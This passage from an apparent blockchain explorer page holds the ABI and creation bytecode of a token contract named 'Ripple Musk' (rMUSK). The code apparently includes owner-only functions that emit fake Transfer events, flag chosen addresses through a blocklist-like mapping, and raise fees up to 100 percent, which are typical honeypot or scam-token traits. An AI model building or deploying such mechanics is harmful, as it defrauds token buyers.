uts":[{"indexed":false,"internalType":"uint256","name":"maxWallet","type":"uint256"}],"name":"MaxWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"sellTaxTotal","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"sellMarketingTax","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"sellProjectTax","type":"uint256"}],"name":"SellFeeUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetPairLPool","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"},{"indexed":false,"internalType":"uint256","name":"swapBackValueMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"swapBackValueMax","type":"uint256"}],"name":"SwapbackSettingsUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"TradingEnabled","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxTx","type":"uint256"}],"name":"changeLimitTxMax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"address","name":"lpPair","type":"address"},{"internalType":"uint256","name":"val","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_add","type":"address"},{"internalType":"bool","name":"_excluded","type":"bool"}],"name":"feeWhitelist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_add","type":"address"},{"internalType":"bool","name":"_excluded","type":"bool"}],"name":"limitWhitelist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"address_","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"newFeeBuySet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"newFeeSellSet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"newFeeTransferSet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxWallet","type":"uint256"}],"name":"newLimitWalletMax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_target","type":"address"}],"name":"readAddressInfo","outputs":[{"internalType":"bool","name":"_transferTaxExempt","type":"bool"},{"internalType":"bool","name":"_transferLimitExempt","type":"bool"},{"internalType":"bool","name":"_automatedMarketMakerPairs","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"readContractSellInfo","outputs":[{"internalType":"bool","name":"_swapbackEnabled","type":"bool"},{"internalType":"uint256","name":"_caSBcackValueMin","type":"uint256"},{"internalType":"uint256","name":"_caSBcackValueMax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"readFeesInfo","outputs":[{"internalType":"uint256","name":"_buyTaxTotal","type":"uint256"},{"internalType":"uint256","name":"_sellTaxTotal","type":"uint256"},{"internalType":"uint256","name":"_transferTaxTotal","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"readLimitsInfo","outputs":[{"internalType":"bool","name":"_limitsEnabled","type":"bool"},{"internalType":"uint256","name":"_maxWallet","type":"uint256"},{"internalType":"uint256","name":"_maxTx","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"readMarketingWalletInfo","outputs":[{"internalType":"address","name":"_marketingWallet","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimitsNow","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"}],"name":"sellFeeBps","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_marketing","type":"address"}],"name":"setNewMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_caSBcEnabled","type":"bool"},{"internalType":"uint256","name":"_caSBcTrigger","type":"uint256"},{"internalType":"uint256","name":"_caSBcLimit","type":"uint256"}],"name":"setSwapback","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60c06040525f600860156101000a81548160ff0219169083151502179055505f600860166101000a81548160ff0219169083151502179055506001600860176101000a81548160ff0219169083151502179055506001600860186101000a81548160ff0219169083151502179055503480156200007a575f80fd5b5060405162005926380380620059268339818101604052810190620000a0919062000bfb565b806040518060400160405280600b81526020017f526970706c65204d75736b0000000000000000000000000000000000000000008152506040518060400160405280600581526020017f724d55534b00000000000000000000000000000000000000000000000000000081525081600490816200011e919062000e8f565b50806005908162000130919062000e8f565b5050508060075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000193620001876200055560201b60201c565b6200055c60201b60201c565b505f737a250d5630b4cf539739df2c5dacb4c659f2488d9050620001bf8160016200061f60201b60201c565b8073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200023d573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000263919062000bfb565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c9573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620002ef919062000bfb565b6040518363ffffffff1660e01b81526004016200030e92919062000f84565b6020604051808303815f875af11580156200032b573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000351919062000bfb565b73ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff16815250506200039960a05160016200061f60201b60201c565b620003ae60a0516001620006d760201b60201c565b5f620003bf6200077560201b60201c565b600a620003cd919062001138565b633b9aca00620003de919062001188565b905042600b819055506103e8600a82620003f9919062001188565b620004059190620011ff565b600d819055506103e8600a826200041d919062001188565b620004299190620011ff565b600c819055506103e860018262000441919062001188565b6200044d9190620011ff565b600981905550606460028262000464919062001188565b620004709190620011ff565b600a819055506028600e819055506028600f819055505f601081905550620004a03360016200077d60201b60201c565b620004b33060016200077d60201b60201c565b620004c861dead60016200077d60201b60201c565b620004db8360016200077d60201b60201c565b620004ee3360016200061f60201b60201c565b620005013060016200061f60201b60201c565b6200051661dead60016200061f60201b60201c565b620005298360016200061f60201b60201c565b6200053a336200083560201b60201c565b6200054c3382620008ca60201b60201c565b50505062001453565b5f33905090565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6200062f62000a3a60201b60201c565b8060125f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f4b89c347592b1d537e066cb4ed98d87696ae35164745d7e370e4add16941dc9282604051620006cb919062001252565b60405180910390a25050565b8060135f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fe0f0eeda3b1247853e2a825aa40eb65c3b08879740f68ff00df4745b6bb075b260405160405180910390a35050565b5f6009905090565b6200078d62000a3a60201b60201c565b8060115f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000829919062001252565b60405180910390a25050565b6200084562000a3a60201b60201c565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620008b6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008ad90620012f1565b60405180910390fd5b620008c7816200055c60201b60201c565b50565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200093b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000932906200135f565b60405180910390fd5b6200094e5f838362000acb60201b60201c565b8060035f8282546200096191906200137f565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254620009b591906200137f565b925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a1b9190620013ca565b60405180910390a362000a365f838362000ad060201b60201c565b5050565b62000a4a6200055560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1662000a7062000ad560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff161462000ac9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000ac09062001433565b60405180910390fd5b565b505050565b505050565b5f8062000ae762000af060201b60201c565b90508091505090565b5f8073ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000b6e5760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1662000b91565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62000bc58262000b9a565b9050919050565b62000bd78162000bb9565b811462000be2575f80fd5b50565b5f8151905062000bf58162000bcc565b92915050565b5f6020828403121562000c135762000c1262000b96565b5b5f62000c228482850162000be5565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168062000ca757607f821691505b60208210810362000cbd5762000cbc62000c62565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830262000d217fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000ce4565b62000d2d868362000ce4565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f62000d7762000d7162000d6b8462000d45565b62000d4e565b62000d45565b9050919050565b5f819050919050565b62000d928362000d57565b62000daa62000da18262000d7e565b84845462000cf0565b825550505050565b5f90565b62000dc062000db2565b62000dcd81848462000d87565b505050565b5b8181101562000df45762000de85f8262000db6565b60018101905062000dd3565b5050565b601f82111562000e435762000e0d8162000cc3565b62000e188462000cd5565b8101602085101562000e28578190505b62000e4062000e378562000cd5565b83018262000dd2565b50505b505050565b5f82821c905092915050565b5f62000e655f198460080262000e48565b1980831691505092915050565b5f62000e7f838362000e54565b9150826002028217905092915050565b62000e9a8262000c2b565b67ffffffffffffffff81111562000eb65762000eb562000c35565b5b62000ec2825462000c8f565b62000ecf82828562000df8565b5f60209050601f83116001811462000f05575f841562000ef0578287015190505b62000efc858262000e72565b86555062000f6b565b601f19841662000f158662000cc3565b5f5b8281101562000f3e5784890151825560018201915060208501945060208101905062000f17565b8683101562000f5e578489015162000f5a601f89168262000e54565b8355505b6001600288020188555050505b505050505050565b62000f7e8162000bb9565b82525050565b5f60408201905062000f995f83018562000f73565b62000fa8602083018462000f73565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115620010395780860481111562001011576200101062000faf565b5b6001851615620010215780820291505b8081029050620010318562000fdc565b945062000ff1565b94509492505050565b5f8262001053576001905062001125565b8162001062575f905062001125565b81600181146200107b57600281146200108657620010bc565b600191505062001125565b60ff8411156200109b576200109a62000faf565b5b8360020a915084821115620010b557620010b462000faf565b5b5062001125565b5060208310610133831016604e8410600b8410161715620010f65782820a905083811115620010f057620010ef62000faf565b5b62001125565b62001105848484600162000fe8565b925090508184048111156200111f576200111e62000faf565b5b81810290505b9392505050565b5f60ff82169050919050565b5f620011448262000d45565b915062001151836200112c565b9250620011807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462001042565b905092915050565b5f620011948262000d45565b9150620011a18362000d45565b9250828202620011b18162000d45565b91508282048414831517620011cb57620011ca62000faf565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6200120b8262000d45565b9150620012188362000d45565b9250826200122b576200122a620011d2565b5b828204905092915050565b5f8115159050919050565b6200124c8162001236565b82525050565b5f602082019050620012675f83018462001241565b92915050565b5f82825260208201905092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f620012d96026836200126d565b9150620012e6826200127d565b604082019050919050565b5f6020820190508181035f8301526200130a81620012cb565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62001347601f836200126d565b9150620013548262001311565b602082019050919050565b5f6020820190508181035f830152620013788162001339565b9050919050565b5f6200138b8262000d45565b9150620013988362000d45565b9250828201905080821115620013b357620013b262000faf565b5b92915050565b620013c48162000d45565b82525050565b5f602082019050620013df5f830184620013b9565b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6200141b6020836200126d565b91506200142882620013e5565b602082019050919050565b5f6020820190508181035f8301526200144c816200140d565b9050919050565b60805160a0516144a6620014805f395f50505f8181612d6101528181612e400152612e6701526144a65ff3fe6080604052600436106101fc575f3560e01c80638da5cb5b1161010c578063b6c937ce1161009f578063dd62ed3e1161006e578063dd62ed3e146106fd578063eea9351314610739578063f2fde38b14610761578063f6f6d95d14610789578063fea82751146107c757610203565b8063b6c937ce14610669578063c138e5e114610691578063c9567bf9146106bb578063caa13d20146106d157610203565b806395d89b41116100db57806395d89b411461059f578063a24c7a9a146105c9578063a457c2d7146105f1578063a9059cbb1461062d57610203565b80638da5cb5b146104f95780638ee600711461052357806391ceee8d1461054b57806392057a381461057357610203565b8063313ce5671161018f57806342966c681161015e57806342966c681461044157806370a0823114610469578063715018a6146104a55780637173163e146104bb5780638c7a0280146104d157610203565b8063313ce5671461037757806339509351146103a15780633a61363a146103dd5780633fd0e1761461040557610203565b806318160ddd116101cb57806318160ddd146102bd5780631e0d5537146102e757806323b872dd1461030f578063241a6fad1461034b57610203565b806306fdde0314610207578063095ea7b3146102315780631111f43f1461026d5780631600d3021461029557610203565b3661020357005b5f80fd5b348015610212575f80fd5b5061021b6107ef565b6040516102289190612f9a565b60405180910390f35b34801561023c575f80fd5b506102576004803603810190610252919061304f565b61087f565b60405161026491906130a7565b60405180910390f35b348015610278575f80fd5b50610293600480360381019061028e919061314b565b61089c565b005b3480156102a0575f80fd5b506102bb60048036038101906102b691906131a8565b610945565b005b3480156102c8575f80fd5b506102d1610a0b565b6040516102de91906131e2565b60405180910390f35b3480156102f2575f80fd5b5061030d600480360381019061030891906131fb565b610a14565b005b34801561031a575f80fd5b5061033560048036038101906103309190613239565b610ac2565b60405161034291906130a7565b60405180910390f35b348015610356575f80fd5b5061035f610bb4565b60405161036e93929190613289565b60405180910390f35b348015610382575f80fd5b5061038b610bd8565b60405161039891906132d9565b60405180910390f35b3480156103ac575f80fd5b506103c760048036038101906103c2919061304f565b610be0565b6040516103d491906130a7565b60405180910390f35b3480156103e8575f80fd5b5061040360048036038101906103fe91906132f2565b610c87565b005b348015610410575f80fd5b5061042b600480360381019061042691906131a8565b610d42565b60405161043891906130a7565b60405180910390f35b34801561044c575f80fd5b5061046760048036038101906104629190613363565b610d94565b005b348015610474575f80fd5b5061048f600480360381019061048a91906131a8565b610db0565b60405161049c91906131e2565b60405180910390f35b3480156104b0575f80fd5b506104b9610df5565b005b3480156104c6575f80fd5b506104cf610e08565b005b3480156104dc575f80fd5b506104f760048036038101906104f29190613363565b610e60565b005b348015610504575f80fd5b5061050d610eb8565b60405161051a919061339d565b60405180910390f35b34801561052e575f80fd5b5061054960048036038101906105449190613363565b610ee0565b005b348015610556575f80fd5b50610571600480360381019061056c9190613363565b610f79565b005b34801561057e575f80fd5b50610587611027565b604051610596939291906133b6565b60405180910390f35b3480156105aa575f80fd5b506105b361103e565b6040516105c09190612f9a565b60405180910390f35b3480156105d4575f80fd5b506105ef60048036038101906105ea9190613363565b6110ce565b005b3480156105fc575f80fd5b506106176004803603810190610612919061304f565b61117c565b60405161062491906130a7565b60405180910390f35b348015610638575f80fd5b50610653600480360381019061064e919061304f565b611262565b60405161066091906130a7565b60405180910390f35b348015610674575f80fd5b5061068f600480360381019061068a91906133eb565b61127f565b005b34801561069c575f80fd5b506106a56113b4565b6040516106b2919061339d565b60405180910390f35b3480156106c6575f80fd5b506106cf6113dc565b005b3480156106dc575f80fd5b506106e5611449565b6040516106f493929190613289565b60405180910390f35b348015610708575f80fd5b50610723600480360381019061071e919061343b565b61146d565b60405161073091906131e2565b60405180910390f35b348015610744575f80fd5b5061075f600480360381019061075a91906131fb565b6114ef565b005b34801561076c575f80fd5b50610787600480360381019061078291906131a8565b61159d565b005b348015610794575f80fd5b506107af60048036038101906107aa91906131a8565b61161f565b6040516107be93929190613479565b60405180910390f35b3480156107d2575f80fd5b506107ed60048036038101906107e89190613363565b61170d565b005b6060600480546107fe906134db565b80601f016020809104026020016040519081016040528092919081815260200182805461082a906134db565b80156108755780601f1061084c57610100808354040283529160200191610875565b820191905f5260205f20905b81548152906001019060200180831161085857829003601f168201915b5050505050905090565b5f61089261088b6117a6565b84846117ad565b6001905092915050565b6108a4611970565b5f5b8383905081101561093f578160145f8686858181106108c8576108c761350b565b5b90506020020160208101906108dd91906131a8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061093790613565565b9150506108a6565b50505050565b61094d611970565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8616c7a330e3cf61290821331585511f1e2778171e2b005fb5ec60cfe874dc6760405160405180910390a38060085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f600354905090565b610a1c611970565b8060115f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051610ab691906130a7565b60405180910390a25050565b5f610ace8484846119ee565b5f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610b156117a6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610b94576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8b9061361c565b60405180910390fd5b610ba885610ba06117a6565b8584036117ad565b60019150509392505050565b5f805f600860179054906101000a900460ff169250600c549150600d549050909192565b5f6009905090565b5f610c7d610bec6117a6565b848460015f610bf96117a6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610c78919061363a565b6117ad565b6001905092915050565b610c8f611970565b5f5b84849050811015610d3b57848482818110610caf57610cae61350b565b5b9050602002016020810190610cc491906131a8565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d2091906131e2565b60405180910390a38080610d3390613565565b915050610c91565b5050505050565b5f60145f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b610d9c611970565b610dad610da76117a6565b826124db565b50565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610dfd611970565b610e065f612684565b565b610e10611970565b5f600860176101000a81548160ff0219169083151502179055505f601081905550427ff4eaa75eae08ae80c3daf791438dac1cff2cfd3b0bad2304ec7bbb067e50261660405160405180910390a2565b610e68611970565b8060108190555060646010541115610eb5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eac906136dd565b60405180910390fd5b50565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b610ee8611970565b80600f819055506064600f541115610f35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2c9061376b565b60405180910390fd5b7fcb5f36df892836a2eaedc349de29a7581176990398ee185d16eaa8f6c1abd8f1600f54600f54600f54604051610f6e939291906133b6565b60405180910390a150565b610f81611970565b6002811015610fc5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fbc906137d3565b60405180910390fd5b6103e8610fd0610a0b565b82610fdb91906137f1565b610fe5919061385f565b600d819055507fff3dd5e80294197918c284bbfc3dadd97d0b40ce92106110946329088f80068a600d5460405161101c91906131e2565b60405180910390a150565b5f805f600e549250600f5491506010549050909192565b60606005805461104d906134db565b80601f0160208091040260200160405190810160405280929190818152602001828054611079906134db565b80156110c45780601f1061109b576101008083540402835291602001916110c4565b820191905f5260205f20905b8154815290600101906020018083116110a757829003601f168201915b5050505050905090565b6110d6611970565b600581101561111a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611111906138ff565b60405180910390fd5b6103e8611125610a0b565b8261113091906137f1565b61113a919061385f565b600c819055507f12528a3c61e0f3b2d6fc707a9fc58b1af86e252cad0d7f4c154ebeabb162dace600c5460405161117191906131e2565b60405180910390a150565b5f8060015f6111896117a6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015611243576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123a9061398d565b60405180910390fd5b61125761124e6117a6565b858584036117ad565b600191505092915050565b5f61127561126e6117a6565b84846119ee565b6001905092915050565b611287611970565b60018210156112cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112c290613a1b565b60405180910390fd5b8181101561130e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130590613aa9565b60405180910390fd5b82600860166101000a81548160ff02191690831515021790555061271082611334610a0b565b61133e91906137f1565b611348919061385f565b6009819055506127108161135a610a0b565b61136491906137f1565b61136e919061385f565b600a819055507f52cd2cdb42ff0eeec9362d7ed5b04f64c8d022697128b5378fc51cea7e63c7798383836040516113a793929190613289565b60405180910390a1505050565b5f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6113e4611970565b6001600860156101000a81548160ff0219169083151502179055506001600860166101000a81548160ff021916908315150217905550427fb3da2db3dfc3778f99852546c6e9ab39ec253f9de7b0847afec61bd27878e92360405160405180910390a2565b5f805f600860169054906101000a900460ff1692506009549150600a549050909192565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6114f7611970565b8060125f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f4b89c347592b1d537e066cb4ed98d87696ae35164745d7e370e4add16941dc928260405161159191906130a7565b60405180910390a25050565b6115a5611970565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611613576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160a90613b37565b60405180910390fd5b61161c81612684565b50565b5f805f60115f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16925060125f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16915060135f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1690509193909250565b611715611970565b80600e819055506064600e541115611762576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161175990613bc5565b60405180910390fd5b7f38513c502b0ab4834ac1df9502b76f75dcf7092469782cfd0db7fe664388e25e600e54600e54600e5460405161179b939291906133b6565b60405180910390a150565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361181b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161181290613c53565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611889576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161188090613ce1565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161196391906131e2565b60405180910390a3505050565b6119786117a6565b73ffffffffffffffffffffffffffffffffffffffff16611996612747565b73ffffffffffffffffffffffffffffffffffffffff16146119ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119e390613d49565b60405180910390fd5b565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16